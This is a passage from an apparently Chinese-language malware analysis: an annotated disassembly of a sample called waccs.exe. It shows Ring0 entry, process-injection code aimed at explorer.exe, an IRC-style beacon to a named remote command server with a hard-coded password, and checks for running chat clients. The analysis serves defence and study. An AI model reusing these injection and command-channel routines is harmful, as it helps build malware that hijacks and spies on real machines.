8B09 MOV ECX,DWORD PTR DS:[ECX] 00406593 E8 64F8FFFF CALL waccs.00405DFC ; 调用ZwSystemDebugControl进入Ring0. 00406598 EB 0C JMP SHORT waccs.004065A6 0040659A 8B55 F0 MOV EDX,DWORD PTR SS:[EBP-10] 0040659D 3B55 F4 CMP EDX,DWORD PTR SS:[EBP-C] 004065A0 ^ 0F85 15FFFFFF JNZ waccs.004064BB 004065A6 8BE5 MOV ESP,EBP 004065A8 5D POP EBP 004065A9 C2 0400 RETN 4 ; 返回. 向系统桌面程序“explorer.exe”进程内存空间中注入恶意代码，执行进程守护功能： 00405510 55 PUSH EBP 00405511 8BEC MOV EBP,ESP 00405513 81EC FC020000 SUB ESP,2FC 00405519 57 PUSH EDI 0040551A B8 D993A38B MOV EAX,8BA393D9 0040551F 50 PUSH EAX 00405520 8D8D 6CFDFFFF LEA ECX,DWORD PTR SS:[EBP-294] 00405526 E8 D5030000 CALL waccs.00405900 ; ASCII "kernel32.dll" 0040552B 50 PUSH EAX ; /pModule = "kernel32.dll" 0040552C FF15 9C804000 CALL DWORD PTR DS:[40809C] ; kernel32.GetModuleHandleA 00405532 8985 7CFDFFFF MOV DWORD PTR SS:[EBP-284],EAX 00405538 8D8D 6CFDFFFF LEA ECX,DWORD PTR SS:[EBP-294] 0040553E E8 FD020000 CALL waccs.00405840 ; 清除内存数据. 00405543 B9 C2A545F2 MOV ECX,F245A5C2 00405548 51 PUSH ECX 00405549 8D8D 60FDFFFF LEA ECX,DWORD PTR SS:[EBP-2A0] 0040554F E8 2C040000 CALL waccs.00405980 ; ASCII "CloseHandle" 00405554 50 PUSH EAX ; /ProcNameOrOrdinal = "CloseHandle" 00405555 8B95 7CFDFFFF MOV EDX,DWORD PTR SS:[EBP-284] 0040555B 52 PUSH EDX ; \|hModule = 7C800000 (kernel32) 0040555C FF15 44804000 CALL DWORD PTR DS:[408044] ; kernel32.GetProcAddress 00405562 8985 80FDFFFF MOV DWORD PTR SS:[EBP-280],EAX 00405568 8D8D 60FDFFFF LEA ECX,DWORD PTR SS:[EBP-2A0] 0040556E E8 9D020000 CALL waccs.00405810 ; 清除内存数据. 00405573 68 22F85E60 PUSH 605EF822 00405578 8D8D 54FDFFFF LEA ECX,DWORD PTR SS:[EBP-2AC] 0040557E E8 7D040000 CALL waccs.00405A00 ; ASCII "CreateFileA" 00405583 50 PUSH EAX ; /ProcNameOrOrdinal = "CreateFileA" 00405584 8B85 7CFDFFFF MOV EAX,DWORD PTR SS:[EBP-284] 0040558A 50 PUSH EAX ; \|hModule = 7C800000 (kernel32) 0040558B FF15 44804000 CALL DWORD PTR DS:[408044] ; kernel32.GetProcAddress 00405591 8985 84FDFFFF MOV DWORD PTR SS:[EBP-27C],EAX 00405597 8D8D 54FDFFFF LEA ECX,DWORD PTR SS:[EBP-2AC] 0040559D E8 6E020000 CALL waccs.00405810 ; 清除内存数据. 004055A2 68 2C150011 PUSH 1100152C 004055A7 8D8D 44FDFFFF LEA ECX,DWORD PTR SS:[EBP-2BC] 004055AD E8 CE040000 CALL waccs.00405A80 ; ASCII "CreateMutexA" 004055B2 50 PUSH EAX ; /ProcNameOrOrdinal = "CreateMutexA" 004055B3 8B8D 7CFDFFFF MOV ECX,DWORD PTR SS:[EBP-284] 004055B9 51 PUSH ECX ; \|hModule = 7C800000 (kernel32) 004055BA FF15 44804000 CALL DWORD PTR DS:[408044] ; kernel32.GetProcAddress 004055C0 8985 88FDFFFF MOV DWORD PTR SS:[EBP-278],EAX 004055C6 8D8D 44FDFFFF LEA ECX,DWORD PTR SS:[EBP-2BC] 004055CC E8 6F020000 CALL waccs.00405840 ; 清除内存数据. 004055D1 BA EE438A84 MOV EDX,848A43EE 004055D6 52 PUSH EDX 004055D7 8D8D 34FDFFFF LEA ECX,DWORD PTR SS:[EBP-2CC] 004055DD E8 1E050000 CALL waccs.00405B00 ; ASCII "GetLastError" 004055E2 50 PUSH EAX ; /ProcNameOrOrdinal = "GetLastError" 004055E3 8B85 7CFDFFFF MOV EAX,DWORD PTR SS:[EBP-284] 004055E9 50 PUSH EAX ; \|hModule = 7C800000 (kernel32) 004055EA FF15 44804000 CALL DWORD PTR DS:[408044] ; kernel32.GetProcAddress 004055F0 8985 8CFDFFFF MOV DWORD PTR SS:[EBP-274],EAX 004055F6 8D8D 34FDFFFF LEA ECX,DWORD PTR SS:[EBP-2CC] 004055FC E8 3F020000 CALL waccs.00405840 ; 清除内存数据. 00405601 68 EF642F4B PUSH 4B2F64EF 00405606 8D8D 24FDFFFF LEA ECX,DWORD PTR SS:[EBP-2DC] 0040560C E8 6F050000 CALL waccs.00405B80 ; ASCII "ReleaseMutex" 00405611 50 PUSH EAX ; /ProcNameOrOrdinal = "ReleaseMutex" 00405612 8B8D 7CFDFFFF MOV ECX,DWORD PTR SS:[EBP-284] 00405618 51 PUSH ECX ; \|hModule = 7C800000 (kernel32) 00405619 FF15 44804000 CALL DWORD PTR DS:[408044] ; kernel32.GetProcAddress 0040561F 8985 90FDFFFF MOV DWORD PTR SS:[EBP-270],EAX 00405625 8D8D 24FDFFFF LEA ECX,DWORD PTR SS:[EBP-2DC] 0040562B E8 10020000 CALL waccs.00405840 ; 清除内存数据. 00405630 68 C0DE9D2B PUSH 2B9DDEC0 00405635 8D8D 1CFDFFFF LEA ECX,DWORD PTR SS:[EBP-2E4] 0040563B E8 C0050000 CALL waccs.00405C00 ; ASCII "Sleep" 00405640 50 PUSH EAX ; /ProcNameOrOrdinal = "Sleep" 00405641 8B95 7CFDFFFF MOV EDX,DWORD PTR SS:[EBP-284] 00405647 52 PUSH EDX ; \|hModule = 7C800000 (kernel32) 00405648 FF15 44804000 CALL DWORD PTR DS:[408044] ; kernel32.GetProcAddress 0040564E 8985 94FDFFFF MOV DWORD PTR SS:[EBP-26C],EAX 00405654 8D8D 1CFDFFFF LEA ECX,DWORD PTR SS:[EBP-2E4] 0040565A E8 11020000 CALL waccs.00405870 ; 清除内存数据. 0040565F B8 193BE6A9 MOV EAX,A9E63B19 00405664 50 PUSH EAX 00405665 8D8D 14FDFFFF LEA ECX,DWORD PTR SS:[EBP-2EC] 0040566B E8 10060000 CALL waccs.00405C80 ; ASCII "WinExec" 00405670 50 PUSH EAX ; /ProcNameOrOrdinal = "WinExec" 00405671 8B8D 7CFDFFFF MOV ECX,DWORD PTR SS:[EBP-284] 00405677 51 PUSH ECX ; \|hModule = 7C800000 (kernel32) 00405678 FF15 44804000 CALL DWORD PTR DS:[408044] ; kernel32.GetProcAddress 0040567E 8985 98FDFFFF MOV DWORD PTR SS:[EBP-268],EAX 00405684 8D8D 14FDFFFF LEA ECX,DWORD PTR SS:[EBP-2EC] 0040568A E8 11020000 CALL waccs.004058A0 ; 清除内存数据. 0040568F B9 51000000 MOV ECX,51 00405694 33C0 XOR EAX,EAX 00405696 8DBD 9CFDFFFF LEA EDI,DWORD PTR SS:[EBP-264] 0040569C F3:AB REP STOS DWORD PTR ES:[EDI] 0040569E 8D95 E8FEFFFF LEA EDX,DWORD PTR SS:[EBP-118] 004056A4 52 PUSH EDX 004056A5 6A 00 PUSH 0 004056A7 B8 E4CE3489 MOV EAX,8934CEE4 004056AC 50 PUSH EAX 004056AD 8D8D 04FDFFFF LEA ECX,DWORD PTR SS:[EBP-2FC] 004056B3 E8 48060000 CALL waccs.00405D00 ; ASCII "Shell_TrayWnd" 004056B8 50 PUSH EAX ; ASCII "Shell_TrayWnd" 004056B9 FF15 88814000 CALL DWORD PTR DS:[408188] ; USER32.FindWindowA(寻找"Shell_TrayWnd"窗口，该窗口进程名为“explorer.exe”，是系统桌面程序). 004056BF 50 PUSH EAX 004056C0 FF15 A8814000 CALL DWORD PTR DS:[4081A8] ; USER32.GetWindowThreadProcessId(获取进程ID). 004056C6 8D8D 04FDFFFF LEA ECX,DWORD PTR SS:[EBP-2FC] 004056CC E8 FF010000 CALL waccs.004058D0 ; 清除内存数据. 004056D1 8B8D E8FEFFFF MOV ECX,DWORD PTR SS:[EBP-118] 004056D7 51 PUSH ECX 004056D8 6A 00 PUSH 0 004056DA 68 FF0F1F00 PUSH 1F0FFF ; Access = PROCESS_ALL_ACCESS 004056DF FF15 48804000 CALL DWORD PTR DS:[408048] ; kernel32.OpenProcess(打开系统桌面程序“explorer.exe”进程). 004056E5 8985 E4FEFFFF MOV DWORD PTR SS:[EBP-11C],EAX 004056EB 83BD E4FEFFFF 0>CMP DWORD PTR SS:[EBP-11C],0 004056F2 75 07 JNZ SHORT waccs.004056FB 004056F4 33C0 XOR EAX,EAX 004056F6 E9 10010000 JMP waccs.0040580B ; 如果打开系统桌面程序“explorer.exe”进程失败则退出(返回)该函数. 004056FB 68 03010000 PUSH 103 00405700 8D95 F4FEFFFF LEA EDX,DWORD PTR SS:[EBP-10C] 00405706 52 PUSH EDX 00405707 6A 00 PUSH 0 00405709 FF15 98804000 CALL DWORD PTR DS:[408098] ; kernel32.GetModuleFileNameA(获取程序自身路径名). 0040570F 68 03010000 PUSH 103 ; /maxlen = 103 (259.) 00405714 8D85 F4FEFFFF LEA EAX,DWORD PTR SS:[EBP-10C] 0040571A 50 PUSH EAX ; \|src = "C:\WINDOWS\system32\waccs.exe" 0040571B 8D8D 9CFDFFFF LEA ECX,DWORD PTR SS:[EBP-264] 00405721 51 PUSH ECX ; \|dest = 0012F56C 00405722 E8 75190000 CALL waccs.0040709C ; JMP 到 msvcrt.strncpy 00405727 83C4 0C ADD ESP,0C 0040572A 6A 3F PUSH 3F ; /maxlen = 3F (63.) 0040572C 8B55 08 MOV EDX,DWORD PTR SS:[EBP+8] 0040572F 52 PUSH EDX ; \|src = "t3x0" 00405730 8D85 A0FEFFFF LEA EAX,DWORD PTR SS:[EBP-160] 00405736 50 PUSH EAX ; \|dest = 0012F670 00405737 E8 60190000 CALL waccs.0040709C ; JMP 到 msvcrt.strncpy 0040573C 83C4 0C ADD ESP,0C 0040573F 6A 04 PUSH 4 00405741 68 00100000 PUSH 1000 00405746 68 60010000 PUSH 160 0040574B 6A 00 PUSH 0 0040574D 8B8D E4FEFFFF MOV ECX,DWORD PTR SS:[EBP-11C] 00405753 51 PUSH ECX 00405754 FF15 4C804000 CALL DWORD PTR DS:[40804C] ; kernel32.VirtualAllocEx(在目标进程“explorer.exe”中申请内存). 0040575A 8945 FC MOV DWORD PTR SS:[EBP-4],EAX 0040575D 8D95 F0FEFFFF LEA EDX,DWORD PTR SS:[EBP-110] 00405763 52 PUSH EDX ; /pBytesWritten = 0012F6C0 00405764 68 60010000 PUSH 160 ; \|BytesToWrite = 160 (352.) 00405769 8D85 80FDFFFF LEA EAX,DWORD PTR SS:[EBP-280] 0040576F 50 PUSH EAX ; \|Buffer = 0012F550 00405770 8B4D FC MOV ECX,DWORD PTR SS:[EBP-4] 00405773 51 PUSH ECX ; \|Address = 1460000 00405774 8B95 E4FEFFFF MOV EDX,DWORD PTR SS:[EBP-11C] 0040577A 52 PUSH EDX ; \|hProcess = 000000A4 (window) 0040577B FF15 50804000 CALL DWORD PTR DS:[408050] ; kernel32.WriteProcessMemory(向目标进程“explorer.exe”内存空间中注入代码[数据段],代码数据在地址"0012F550"处，大小为0x160 "352."). 00405781 B8 0B554000 MOV EAX,waccs.0040550B 00405786 2D 60544000 SUB EAX,waccs.00405460 0040578B 8945 F8 MOV DWORD PTR SS:[EBP-8],EAX 0040578E 6A 40 PUSH 40 00405790 68 00100000 PUSH 1000 00405795 8B4D F8 MOV ECX,DWORD PTR SS:[EBP-8] 00405798 51 PUSH ECX 00405799 6A 00 PUSH 0 0040579B 8B95 E4FEFFFF MOV EDX,DWORD PTR SS:[EBP-11C] 004057A1 52 PUSH EDX 004057A2 FF15 4C804000 CALL DWORD PTR DS:[40804C] ; kernel32.VirtualAllocEx(在目标进程“explorer.exe”中申请内存). 004057A8 8985 E0FEFFFF MOV DWORD PTR SS:[EBP-120],EAX 004057AE 8D85 F0FEFFFF LEA EAX,DWORD PTR SS:[EBP-110] 004057B4 50 PUSH EAX ; /pBytesWritten = 0012F6C0 004057B5 8B4D F8 MOV ECX,DWORD PTR SS:[EBP-8] 004057B8 51 PUSH ECX ; \|BytesToWrite = AB (171.) 004057B9 68 60544000 PUSH waccs.00405460 ; \|Buffer = waccs.00405460 004057BE 8B95 E0FEFFFF MOV EDX,DWORD PTR SS:[EBP-120] 004057C4 52 PUSH EDX ; \|Address = 1A50000 004057C5 8B85 E4FEFFFF MOV EAX,DWORD PTR SS:[EBP-11C] 004057CB 50 PUSH EAX ; \|hProcess = 000000A4 (window) 004057CC FF15 50804000 CALL DWORD PTR DS:[408050] ; kernel32.WriteProcessMemory(向目标进程“explorer.exe”内存空间中注入代码[代码段],代码数据在地址"00405460"处，大小为0xAB "171."). 004057D2 6A 00 PUSH 0 004057D4 6A 00 PUSH 0 004057D6 8B4D FC MOV ECX,DWORD PTR SS:[EBP-4] 004057D9 51 PUSH ECX 004057DA 8B95 E0FEFFFF MOV EDX,DWORD PTR SS:[EBP-120] 004057E0 52 PUSH EDX 004057E1 6A 00 PUSH 0 004057E3 6A 00 PUSH 0 004057E5 8B85 E4FEFFFF MOV EAX,DWORD PTR SS:[EBP-11C] 004057EB 50 PUSH EAX 004057EC FF15 54804000 CALL DWORD PTR DS:[408054] ; kernel32.CreateRemoteThread(创建远程线程). 004057F2 8985 ECFEFFFF MOV DWORD PTR SS:[EBP-114],EAX 004057F8 8B8D E4FEFFFF MOV ECX,DWORD PTR SS:[EBP-11C] 004057FE 51 PUSH ECX 004057FF FF15 58804000 CALL DWORD PTR DS:[408058] ; kernel32.CloseHandle(关闭进程句柄). 00405805 8B85 ECFEFFFF MOV EAX,DWORD PTR SS:[EBP-114] 0040580B 5F POP EDI 0040580C 8BE5 MOV ESP,EBP 0040580E 5D POP EBP 0040580F C3 RETN ; 返回. 连接骇客远程服务器"http://www.secure.freebsd.la"： 004010AA 55 PUSH EBP 004010AB 8BEC MOV EBP,ESP 004010AD 83EC 24 SUB ESP,24 004010B0 6A 06 PUSH 6 ; /Family = AF_INET 004010B2 6A 01 PUSH 1 ; \|Type = SOCK_STREAM 004010B4 6A 02 PUSH 2 ; \|Family = AF_INET 004010B6 FF15 E0814000 CALL DWORD PTR DS:[4081E0] ; WS2_32.socket 004010BC 8B4D 08 MOV ECX,DWORD PTR SS:[EBP+8] 004010BF 8901 MOV DWORD PTR DS:[ECX],EAX 004010C1 6A 00 PUSH 0 ; /ShowState = SW_HIDE 004010C3 68 7833E110 PUSH 10E13378 004010C8 8D4D DC LEA ECX,DWORD PTR SS:[EBP-24] 004010CB E8 A6100000 CALL waccs.00402176 ; ASCII "ipconfig /flushdns" 004010D0 50 PUSH EAX ; \|CmdLine = "ipconfig /flushdns"(命令). 004010D1 FF15 5C804000 CALL DWORD PTR DS:[40805C] ; kernel32.WinExec(执行DOS控制台命令). 004010D7 8D4D DC LEA ECX,DWORD PTR SS:[EBP-24] 004010DA E8 B70D0000 CALL waccs.00401E96 ; 清除内存数据. 004010DF 6A 10 PUSH 10 004010E1 6A 00 PUSH 0 004010E3 8D45 F0 LEA EAX,DWORD PTR SS:[EBP-10] 004010E6 50 PUSH EAX 004010E7 E8 4E5F0000 CALL waccs.0040703A ; JMP 到 msvcrt.memset 004010EC 83C4 0C ADD ESP,0C 004010EF 66:C745 F0 0200 MOV WORD PTR SS:[EBP-10],2 004010F5 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 004010F8 66:8B80 8400000>MOV AX,WORD PTR DS:[EAX+84] 004010FF 50 PUSH EAX ; /NetShort = 122646 00401100 FF15 D0814000 CALL DWORD PTR DS:[4081D0] ; WS2_32.ntohs(返回一个以主机字节顺序表达的数). 00401106 66:8945 F2 MOV WORD PTR SS:[EBP-E],AX 0040110A 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 0040110D 83C0 04 ADD EAX,4 00401110 50 PUSH EAX 00401111 E8 252B0000 CALL waccs.00403C3B ; 完成主机名到地址解析. 00401116 59 POP ECX 00401117 8945 F4 MOV DWORD PTR SS:[EBP-C],EAX 0040111A 6A 10 PUSH 10 0040111C 8D45 F0 LEA EAX,DWORD PTR SS:[EBP-10] 0040111F 50 PUSH EAX 00401120 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 00401123 FF30 PUSH DWORD PTR DS:[EAX] ; /(Socket = B4 pSockAddr = 0012F7C0 AddrLen = 10 (16.)). 00401125 FF15 CC814000 CALL DWORD PTR DS:[4081CC] ; WS2_32.connect 0040112B 83F8 FF CMP EAX,-1 0040112E 75 0F JNZ SHORT waccs.0040113F ;判断是否连通网络. 00401130 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 00401133 FF30 PUSH DWORD PTR DS:[EAX] 00401135 FF15 C8814000 CALL DWORD PTR DS:[4081C8] ; WS2_32.closesocket(如果连通网络，则关闭连接). 0040113B 32C0 XOR AL,AL 0040113D EB 02 JMP SHORT waccs.00401141 0040113F B0 01 MOV AL,1 00401141 C9 LEAVE 00401142 C3 RETN ; 返回. 完成主机名到地址解析： 00403C3B 55 PUSH EBP 00403C3C 8BEC MOV EBP,ESP 00403C3E 51 PUSH ECX 00403C3F 51 PUSH ECX 00403C40 FF75 08 PUSH DWORD PTR SS:[EBP+8] ; ASCII "secure.freebsd.la" 00403C43 FF15 D4814000 CALL DWORD PTR DS:[4081D4] ; WS2_32.inet_addr 00403C49 8945 FC MOV DWORD PTR SS:[EBP-4],EAX 00403C4C 837D FC FF CMP DWORD PTR SS:[EBP-4],-1 00403C50 75 24 JNZ SHORT waccs.00403C76 00403C52 FF75 08 PUSH DWORD PTR SS:[EBP+8] ; /Name = "secure.freebsd.la" 00403C55 FF15 D8814000 CALL DWORD PTR DS:[4081D8] ; WS2_32.gethostbyname(完成主机名到地址解析). 00403C5B 8945 F8 MOV DWORD PTR SS:[EBP-8],EAX 00403C5E 837D F8 00 CMP DWORD PTR SS:[EBP-8],0 00403C62 75 05 JNZ SHORT waccs.00403C69 ; 判断是否成功. 00403C64 83C8 FF OR EAX,FFFFFFFF 00403C67 EB 10 JMP SHORT waccs.00403C79 00403C69 8B45 F8 MOV EAX,DWORD PTR SS:[EBP-8] 00403C6C 8B40 0C MOV EAX,DWORD PTR DS:[EAX+C] 00403C6F 8B00 MOV EAX,DWORD PTR DS:[EAX] 00403C71 8B00 MOV EAX,DWORD PTR DS:[EAX] 00403C73 8945 FC MOV DWORD PTR SS:[EBP-4],EAX 00403C76 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00403C79 C9 LEAVE 00403C7A C3 RETN ; 返回. 查找系统中是否运行某些通讯工具(可能会利用这些通讯工具发布广告、进行自我传播以及窃取其帐号密码信息等操作)，并构造发送数据包(多种包格式/与骇客远程服务器进行秘密通信)： 00401143 55 PUSH EBP 00401144 8BEC MOV EBP,ESP 00401146 83EC 40 SUB ESP,40 00401149 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 0040114C 0FBE80 88000000 MOVSX EAX,BYTE PTR DS:[EAX+88] 00401153 85C0 TEST EAX,EAX 00401155 74 44 JE SHORT waccs.0040119B 00401157 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 0040115A 05 88000000 ADD EAX,88 0040115F 50 PUSH EAX 00401160 68 175FE19B PUSH 9BE15F17 00401165 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C] 00401168 E8 69100000 CALL waccs.004021D6 ; ASCII "PASS %s" 0040116D 50 PUSH EAX 0040116E FF75 08 PUSH DWORD PTR SS:[EBP+8] 00401171 E8 8AFEFFFF CALL waccs.00401000 ; 构造发送数据包(格式：PASS %s). 00401176 83C4 0C ADD ESP,0C 00401179 0FB6C0 MOVZX EAX,AL 0040117C F7D8 NEG EAX 0040117E 1BC0 SBB EAX,EAX 00401180 40 INC EAX 00401181 8845 DC MOV BYTE PTR SS:[EBP-24],AL 00401184 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C] 00401187 E8 4A0E0000 CALL waccs.00401FD6 ; 清除内存数据. 0040118C 0FB645 DC MOVZX EAX,BYTE PTR SS:[EBP-24] 00401190 85C0 TEST EAX,EAX 00401192 74 07 JE SHORT waccs.0040119B 00401194 32C0 XOR AL,AL 00401196 E9 8D000000 JMP waccs.00401228 ; 发送数据包失败则退出(返回). 0040119B FF75 08 PUSH DWORD PTR SS:[EBP+8] 0040119E E8 87000000 CALL waccs.0040122A ; 查找系统中是否运行某些通讯工具，并构造发送数据包(格式：NICK %s). 004011A3 59 POP ECX 004011A4 6A 11 PUSH 11 004011A6 6A 00 PUSH 0 004011A8 8D45 E0 LEA EAX,DWORD PTR SS:[EBP-20] 004011AB 50 PUSH EAX 004011AC E8 895E0000 CALL waccs.0040703A ; JMP 到 msvcrt.memset 004011B1 83C4 0C ADD ESP,0C 004011B4 6A 08 PUSH 8 004011B6 6A 00 PUSH 0 004011B8 8D45 F8 LEA EAX,DWORD PTR SS:[EBP-8] 004011BB 50 PUSH EAX 004011BC E8 795E0000 CALL waccs.0040703A ; JMP 到 msvcrt.memset 004011C1 83C4 0C ADD ESP,0C 004011C4 C745 F4 1000000>MOV DWORD PTR SS:[EBP-C],10 004011CB 8D45 F4 LEA EAX,DWORD PTR SS:[EBP-C] 004011CE 50 PUSH EAX 004011CF 8D45 E0 LEA EAX,DWORD PTR SS:[EBP-20] 004011D2 50 PUSH EAX 004011D3 FF15 60804000 CALL DWORD PTR DS:[408060] ; kernel32.GetComputerNameA(获得机器名称). 004011D9 6A 08 PUSH 8 004011DB 8D45 F8 LEA EAX,DWORD PTR SS:[EBP-8] 004011DE 50 PUSH EAX 004011DF E8 972A0000 CALL waccs.00403C7B ; 获取计算机系统版本号"%s-SP%d". 004011E4 59 POP ECX 004011E5 59 POP ECX 004011E6 8D45 E0 LEA EAX,DWORD PTR SS:[EBP-20] 004011E9 50 PUSH EAX 004011EA 8D45 F8 LEA EAX,DWORD PTR SS:[EBP-8] 004011ED 50 PUSH EAX 004011EE 68 D1F1AD0C PUSH 0CADF1D1 004011F3 8D4D C0 LEA ECX,DWORD PTR SS:[EBP-40] 004011F6 E8 3B100000 CALL waccs.00402236 ; ASCII "USER %s x x :%s" 004011FB 50 PUSH EAX 004011FC FF75 08 PUSH DWORD PTR SS:[EBP+8] 004011FF E8 FCFDFFFF CALL waccs.00401000 ; 并构造发送数据包(格式：USER %s x x :%s). 00401204 83C4 10 ADD ESP,10 00401207 0FB6C0 MOVZX EAX,AL 0040120A F7D8 NEG EAX 0040120C 1BC0 SBB EAX,EAX 0040120E 40 INC EAX 0040120F 8845 D0 MOV BYTE PTR SS:[EBP-30],AL 00401212 8D4D C0 LEA ECX,DWORD PTR SS:[EBP-40] 00401215 E8 1C0D0000 CALL waccs.00401F36 ; 清除内存数据. 0040121A 0FB645 D0 MOVZX EAX,BYTE PTR SS:[EBP-30] 0040121E 85C0 TEST EAX,EAX 00401220 74 04 JE SHORT waccs.00401226 00401222 32C0 XOR AL,AL 00401224 EB 02 JMP SHORT waccs.00401228 00401226 B0 01 MOV AL,1 00401228 C9 LEAVE 00401229 C3 RETN ; 返回. 构造发送数据包(格式：PASS %s)： 00401000 55 PUSH EBP 00401001 8BEC MOV EBP,ESP 00401003 81EC 08040000 SUB ESP,408 00401009 68 00040000 PUSH 400 0040100E 6A 00 PUSH 0 00401010 8D85 00FCFFFF LEA EAX,DWORD PTR SS:[EBP-400] 00401016 50 PUSH EAX 00401017 E8 1E600000 CALL waccs.0040703A ; JMP 到 msvcrt.memset 0040101C 83C4 0C ADD ESP,0C 0040101F 8D45 10 LEA EAX,DWORD PTR SS:[EBP+10] 00401022 8985 FCFBFFFF MOV DWORD PTR SS:[EBP-404],EAX 00401028 FFB5 FCFBFFFF PUSH DWORD PTR SS:[EBP-404] ; /arglist = 0012F784 0040102E FF75 0C PUSH DWORD PTR SS:[EBP+C] ; \|format = "PASS %s" 00401031 68 00040000 PUSH 400 ; \|count = 400 (1024.) 00401036 8D85 00FCFFFF LEA EAX,DWORD PTR SS:[EBP-400] 0040103C 50 PUSH EAX ; \|buffer = 0012F374 0040103D E8 F25F0000 CALL waccs.00407034 ; JMP 到 msvcrt._vsnprintf 00401042 83C4 10 ADD ESP,10 00401045 83A5 FCFBFFFF 0>AND DWORD PTR SS:[EBP-404],0 0040104C 68 00040000 PUSH 400 ; /maxlen = 400 (1024.) 00401051 68 246752BF PUSH BF526724 00401056 8D8D F8FBFFFF LEA ECX,DWORD PTR SS:[EBP-408] 0040105C E8 B5100000 CALL waccs.00402116 ; ASCII "\n" 00401061 50 PUSH EAX ; \|src = "\n" 00401062 8D85 00FCFFFF LEA EAX,DWORD PTR SS:[EBP-400] 00401068 50 PUSH EAX ; \|dest = "PASS su1c1d3" 00401069 E8 C05F0000 CALL waccs.0040702E ; JMP 到 msvcrt.strncat 0040106E 83C4 0C ADD ESP,0C 00401071 8D8D F8FBFFFF LEA ECX,DWORD PTR SS:[EBP-408] 00401077 E8 820F0000 CALL waccs.00401FFE ; 清除内存数据. 0040107C 6A 00 PUSH 0 ; /Flags = 0 0040107E 8D85 00FCFFFF LEA EAX,DWORD PTR SS:[EBP-400] 00401084 50 PUSH EAX ; /s = "PASS su1c1d3\n" 00401085 E8 9E5F0000 CALL waccs.00407028 ; JMP 到 msvcrt.strlen 0040108A 59 POP ECX 0040108B 50 PUSH EAX ; \|DataSize = E (14.) 0040108C 8D85 00FCFFFF LEA EAX,DWORD PTR SS:[EBP-400] 00401092 50 PUSH EAX ; \|Data = 0012F374 00401093 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 00401096 FF30 PUSH DWORD PTR DS:[EAX] ; \|Socket = B4 00401098 FF15 C4814000 CALL DWORD PTR DS:[4081C4] ; WS2_32.send 0040109E 85C0 TEST EAX,EAX 004010A0 7E 04 JLE SHORT waccs.004010A6 004010A2 B0 01 MOV AL,1 004010A4 EB 02 JMP SHORT waccs.004010A8 004010A6 32C0 XOR AL,AL 004010A8 C9 LEAVE 004010A9 C3 RETN ; 返回. 查找系统中是否运行某些通讯工具，并构造发送数据包(格式：NICK %s)： 0040122A 55 PUSH EBP 0040122B 8BEC MOV EBP,ESP 0040122D 81EC 08010000 SUB ESP,108 00401233 56 PUSH ESI 00401234 57 PUSH EDI 00401235 6A 09 PUSH 9 00401237 59 POP ECX 00401238 BE 30904000 MOV ESI,waccs.00409030 ; ASCII "abcdefghijklmnopqrstuvwxyz1234567890" 0040123D 8D7D B4 LEA EDI,DWORD PTR SS:[EBP-4C] 00401240 F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS> 00401242 A4 MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI] 00401243 6A 04 PUSH 4 00401245 6A 00 PUSH 0 00401247 8D45 FC LEA EAX,DWORD PTR SS:[EBP-4] 0040124A 50 PUSH EAX 0040124B E8 EA5D0000 CALL waccs.0040703A ; JMP 到 msvcrt.memset 00401250 83C4 0C ADD ESP,0C 00401253 6A 19 PUSH 19 00401255 6A 00 PUSH 0 00401257 8D45 E0 LEA EAX,DWORD PTR SS:[EBP-20] 0040125A 50 PUSH EAX 0040125B E8 DA5D0000 CALL waccs.0040703A ; JMP 到 msvcrt.memset 00401260 83C4 0C ADD ESP,0C 00401263 FF15 68804000 CALL DWORD PTR DS:[408068] ; kernel32.GetTickCount 00401269 50 PUSH EAX 0040126A E8 DD5D0000 CALL waccs.0040704C ; JMP 到 msvcrt.srand(生成随机数). 0040126F 59 POP ECX 00401270 8365 DC 00 AND DWORD PTR SS:[EBP-24],0 00401274 EB 07 JMP SHORT waccs.0040127D 00401276 8B45 DC MOV EAX,DWORD PTR SS:[EBP-24] 00401279 40 INC EAX 0040127A 8945 DC MOV DWORD PTR SS:[EBP-24],EAX 0040127D 837D DC 0A CMP DWORD PTR SS:[EBP-24],0A 00401281 73 19 JNB SHORT waccs.0040129C ; 生成10位随机数. 00401283 E8 BE5D0000 CALL waccs.00407046 ; JMP 到 msvcrt.rand(生成随机数). 00401288 33D2 XOR EDX,EDX 0040128A 6A 24 PUSH 24 0040128C 59 POP ECX 0040128D F7F1 DIV ECX 0040128F 8B45 DC MOV EAX,DWORD PTR SS:[EBP-24] 00401292 8A4C15 B4 MOV CL,BYTE PTR SS:[EBP+EDX-4C] 00401296 884C05 E0 MOV BYTE PTR SS:[EBP+EAX-20],CL 0040129A ^ EB DA JMP SHORT waccs.00401276 0040129C 6A 04 PUSH 4 ; /BufSize = 4 0040129E 8D45 FC LEA EAX,DWORD PTR SS:[EBP-4] 004012A1 50 PUSH EAX ; \|Buffer = 0012F778 004012A2 6A 07 PUSH 7 ; \|InfoType = 7 004012A4 68 00080000 PUSH 800 ; \|LocaleId = 800 004012A9 FF15 64804000 CALL DWORD PTR DS:[408064] ; kernel32.GetLocaleInfoA(获取设置参数). 004012AF 6A 00 PUSH 0 004012B1 68 52362A35 PUSH 352A3652 004012B6 8D4D 98 LEA ECX,DWORD PTR SS:[EBP-68] 004012B9 E8 78120000 CALL waccs.00402536 ; ASCII "tSkMainForm.UnicodeClass" 004012BE 50 PUSH EAX ; Class = "tSkMainForm.UnicodeClass" 004012BF FF15 88814000 CALL DWORD PTR DS:[408188] ; USER32.FindWindowA 004012C5 85C0 TEST EAX,EAX 004012C7 74 0C JE SHORT waccs.004012D5 004012C9 C785 10FFFFFF 7>MOV DWORD PTR SS:[EBP-F0],waccs.00409074 004012D3 EB 0A JMP SHORT waccs.004012DF 004012D5 C785 10FFFFFF B>MOV DWORD PTR SS:[EBP-F0],waccs.0040A0B8 004012DF 6A 00 PUSH 0 004012E1 68 63E1E390 PUSH 90E3E163 004012E6 8D4D 90 LEA ECX,DWORD PTR SS:[EBP-70] 004012E9 E8 E8110000 CALL waccs.004024D6 